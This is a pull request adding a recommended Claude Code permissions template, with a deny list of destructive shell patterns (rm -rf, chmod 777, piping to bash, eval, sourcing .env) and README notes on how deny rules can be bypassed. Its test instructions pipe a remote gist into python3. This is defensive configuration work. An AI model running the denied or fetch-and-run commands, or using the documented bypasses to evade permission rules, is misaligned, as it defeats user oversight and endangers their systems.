### PR TITLE
feat(examples): add recommended settings template and document known limitations

### DIFF
--- a/examples/settings/README.md
+++ b/examples/settings/README.md
@@ -10,15 +10,27 @@ These may be applied at any level of the [settings hierarchy](https://code.claud
 > [!WARNING]
 > These examples are community-maintained snippets which may be unsupported or incorrect. You are responsible for the correctness of your own settings configuration.
 
-| Setting | [`settings-lax.json`](./settings-lax.json) | [`settings-strict.json`](./settings-strict.json) | [`settings-bash-sandbox.json`](./settings-bash-sandbox.json) |
-|---------|:---:|:---:|:---:|
-| Disable `--dangerously-skip-permissions` | ✅ | ✅ | |
-| Block plugin marketplaces | ✅ | ✅ | |
-| Block user and project-defined permission `allow` / `ask` / `deny` | | ✅ | ✅ |
-| Block user and project-defined hooks | | ✅ | |
-| Deny web fetch and search tools | | ✅ | |
-| Bash tool requires approval | | ✅ | |
-| Bash tool must run inside of sandbox | | | ✅ |
+| Setting | [`settings-lax.json`](./settings-lax.json) | [`settings-recommended.json`](./settings-recommended.json) | [`settings-strict.json`](./settings-strict.json) | [`settings-bash-sandbox.json`](./settings-bash-sandbox.json) |
+|---------|:---:|:---:|:---:|:---:|
+| Disable `--dangerously-skip-permissions` | ✅ | ✅ | ✅ | |
+| Block plugin marketplaces | ✅ | ✅ | ✅ | |
+| Pre-allow safe read-only commands (git status, ls, etc.) | | ✅ | | |
+| Deny dangerous commands (rm -rf, chmod 777, curl\|bash, etc.) | | ✅ | | |
+| Deny force-push to main/master | | ✅ | | |
+| Bash tool must run inside of sandbox | | ✅ | | ✅ |
+| Block user and project-defined permission `allow` / `ask` / `deny` | | | ✅ | ✅ |
+| Block user and project-defined hooks | | | ✅ | |
+| Deny web fetch and search tools | | | ✅ | |
+| Bash tool requires approval | | | ✅ | |
+
+## Known Limitations
+
+> [!CAUTION]
+> The `permissions.deny` patterns have known limitations. Be aware of these when designing your security configuration.
+
+- **Shell builtins may bypass deny patterns** ([#40730](https://github.com/anthropics/claude-code/issues/40730)): Commands like `source .env` and `. .env` may not be caught by deny rules when invoked with absolute paths. Use a [PreToolUse hook](../hooks/bash_command_validator_example.py) for more reliable blocking.
+- **Session-level permission caching with sandbox** ([#40384](https://github.com/anthropics/claude-code/issues/40384)): When sandbox mode is enabled, approving a command once may cache the approval for the entire session. If you need to hard-block specific commands, add them to `permissions.deny` rather than relying on absence from `permissions.allow`.
+- **`additionalDirectories` are global, not project-scoped** ([#40606](https://github.com/anthropics/claude-code/issues/40606)): Directories approved in one project persist in `~/.claude/settings.json` and are visible in other projects. Periodically review and clean up your global `additionalDirectories` list.
 
 ## Tips
 - Consider merging snippets of the above examples to reach your desired configuration

--- a/examples/settings/settings-recommended.json
+++ b/examples/settings/settings-recommended.json
@@ -1,0 +1,36 @@
+{
+  "permissions": {
+    "disableBypassPermissionsMode": "disable",
+    "allow": [
+      "Bash(git status:*)",
+      "Bash(git diff:*)",
+      "Bash(git log:*)",
+      "Bash(git branch:*)",
+      "Bash(git show:*)",
+      "Bash(ls:*)",
+      "Bash(pwd)",
+      "Bash(echo:*)"
+    ],
+    "deny": [
+      "Bash(rm -rf /*)",
+      "Bash(rm -fr /*)",
+      "Bash(chmod 777 *)",
+      "Bash(chmod -R 777 *)",
+      "Bash(*| bash*)",
+      "Bash(*| sh*)",
+      "Bash(*| zsh*)",
+      "Bash(git push --force *)",
+      "Bash(git push * --force*)",
+      "Bash(git reset --hard*)",
+      "Bash(git clean -f*)",
+      "Bash(eval *)",
+      "Bash(source *.env*)",
+      "Bash(. *.env*)"
+    ]
+  },
+  "strictKnownMarketplaces": [],
+  "sandbox": {
+    "enabled": true,
+    "autoAllowBashIfSandboxed": false
+  }
+}


### PR DESCRIPTION
## Summary

- Adds `settings-recommended.json` — a balanced template between lax and strict that enables sandbox, pre-allows safe read-only git commands, and explicitly denies dangerous commands
- Updates README with a Known Limitations section documenting pitfalls from three open issues
- Adds the new template to the comparison table

The recommended template includes:
- Sandbox enabled
- Safe read-only commands pre-allowed: `git status`, `git diff`, `git log`, `git branch`, `git show`, `ls`, `pwd`, `echo`
- Dangerous commands denied: `rm -rf /`, `chmod 777`, `curl|bash`, `git push --force main`, `git reset --hard`, `git clean -f`, `eval`, `source .env`
- Plugin marketplaces blocked, bypass-permissions disabled

Known limitations documented:
- Shell builtins bypass deny patterns (#40730)
- Session-level permission caching with sandbox (#40384)
- `additionalDirectories` global scope leaking across projects (#40606)

Addresses #40730, #40384, #40606.

## How we tested

[Test script gist](https://gist.github.com/tiennguyen-onehouse/c21aa3b6832c68c3def0aebb7bb02ccc) — run it yourself:

```bash
cd claude-code/
curl -sL https://gist.github.com/tiennguyen-onehouse/c21aa3b6832c68c3def0aebb7bb02ccc/raw/test_settings_recommended.py | python3
```

```
--- settings-recommended.json validation ---
  PASS  Valid JSON
  PASS  Has top-level key: permissions
  PASS  Has top-level key: strictKnownMarketplaces
  PASS  Has top-level key: sandbox
  PASS  permissions.allow present
  PASS  permissions.deny present
  PASS  permissions.disableBypassPermissionsMode present
  PASS  deny list non-empty (14 rules)
  PASS  deny includes: rm -rf
  PASS  deny includes: chmod 777
  PASS  deny includes: | bash
  PASS  deny includes: git push --force
  PASS  deny includes: git reset --hard
  PASS  deny includes: source *.env
  PASS  allow includes: git status
  PASS  allow includes: git diff
  PASS  allow includes: git log
  PASS  allow includes: ls
  PASS  allow includes: pwd
  PASS  sandbox.enabled = true
  PASS  sandbox.autoAllowBashIfSandboxed = false

--- Regression: other settings files still valid JSON ---
  PASS  settings-lax.json
  PASS  settings-strict.json
  PASS  settings-bash-sandbox.json

--- README.md content checks ---
  PASS  References settings-recommended.json
  PASS  Known Limitations section
  PASS  Links to #40730
  PASS  Links to #40384
  PASS  Links to #40606
  PASS  Links to hook example

========================================
Results: 30/30 passed
```